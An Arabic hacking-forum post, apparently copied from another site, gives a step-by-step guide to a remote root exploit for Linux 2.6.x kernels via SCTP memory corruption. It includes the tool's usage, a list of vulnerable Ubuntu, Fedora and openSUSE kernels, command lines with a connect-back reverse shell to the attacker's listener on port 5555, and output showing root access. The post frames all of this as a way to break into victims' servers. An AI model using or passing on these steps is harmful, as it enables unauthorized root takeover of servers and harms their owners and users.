الســــلام عليكم شباب ..
اليوم نزل ريموت جديد للإصدار المصاب 2.6.x وبصراحة الظاهر قوي جدا .. ولاكن الترجمة شوية غلبتني وإن شاء الله بنزله خلال كم ساعه بلكثير ...
Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
كود:
http://www.milw0rm.org/exploits/8556
اللحين لنعرف كيف الريموت هذا يشتغل وعلى اي كيرنل بلضبط .. طبعا الشرح حصري شباب وخافوا الله بلسيرفرات العربية ... والله ماشرحت الطريقة الا لكم صديق ولنشر الطريقة لانها مو حصرية بس شوية تركيز تحتاج .. الريموت مو حصري ولاكن حاليا لن يتم نشره حتى إشعار اخر ..
نبتدي علبركة ..
كود:
[r1z@0wnEd ]# ./2.6.x-remote
./sctp_houdini
-H lhost (local host address for connect back shel)
-P lport (local port address for connect back shell)
-h rhost (remote target host)
-p rport (remote target port)
-t kernel (target kernel)
-s sport (source port defining sctp association where corruption occurs)
(always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)
(NEVER reuse the same or next port or vsys will be trashed and init will die soon...)
-c conn (number of connectionis before corruption - default 600)
[root@vps9224 html]# ./2.6-r -H 72.167.131.130 -P 5555 -h 72.167.131.130 -p 20000 -s 15000 -c 700 -t 2.4.21-53.ELsmp
Unable to find target: 2.6.24-19-xen
Available targets are:
- ubuntu64_faisty-2.6.20-[15-17]-generic (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117 (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default (opensuse 11.1 default installed kernel)
[r1z@0wnEd ]#
طيب اللحين اكيد المعظم يقول سهل التطبيق ؟ والمعظم ماهو فاهم شي .. لنشوف الشرح هاذ
هذا الخيار من سيرفرك الي تخترق منه .. يعني لو سيرفر له الايبي
نحطه محل الايبي الي نبي نخترقه bOx ip
هاذ البورت لازم يكون فاتح بسيرفرك ليتصل عليه سيرفر الضحية بعد الإكسبلويت مايتم
والي هو
هو ايبي الضحية ( سيرفر الضحية ) نحط الايبي له وليكن
بورت الإتصال العكسي على سيرفر الضحية وليكن
كيرنل الضحية بنجيبه بلامر هذا
محتوى الامر هذا نكتبه والانواع المصابه بهذا الريموت هم
كود:
- ubuntu64_faisty-2.6.20-[15-17]-generic (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117 (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default (opensuse 11.1 default installed kernel)
بورت الاتصال لبرنامج SCTP الي هو اختصار ل
كود:
Stream Control Transmission Protocol (SCTP)
ولو كانلك شل على سيرفر المخترق نطبق الامر هذا لنشوف اذا السيرفر يحتوي على البرنامج ام لا
كود:
[r1z@0wnEd ]# locate sctp | grep `uname -r`
/lib/modules/2.6.24-19-xen/kernel/net/sctp
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/nf_conntrack_proto_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/xt_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/sctp/sctp.ko
[r1z@0wnEd ]#
هذا الخيار للحجم الباكيت ( الإتصال ) بسيرفر الضحية والاغلب يكون 600 وتقدروا تحطوا رقم اكبر منه مثل 700 - 800
وبلنهاية
كود:
[r1z@0wnEd ]#./2.6.x-remote -H 127.0.0.1 -P 5555 -h 192.168.1.1 -p 20000 -s 15000 -c 600 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0
[r1z@0wnEd ]#GAME OVER
* ملاحظة ...
قبل لاتروتوا اي سيرفر تاكدوا ان السيرفر الي انتوا عليه او جهازك يتنصت على بورت 5555 للإتصال العكسي من جهاز الضحية ..
الريموت مترجم والباس
www.sec-r1z.com
ياليت الي ينشر الموضوع شباب يحفظ الحقوق
SecurityRules
www.sec-r1z.com
منقووول
2>6 sctp_houdini vdl,j []d] ! aJJvp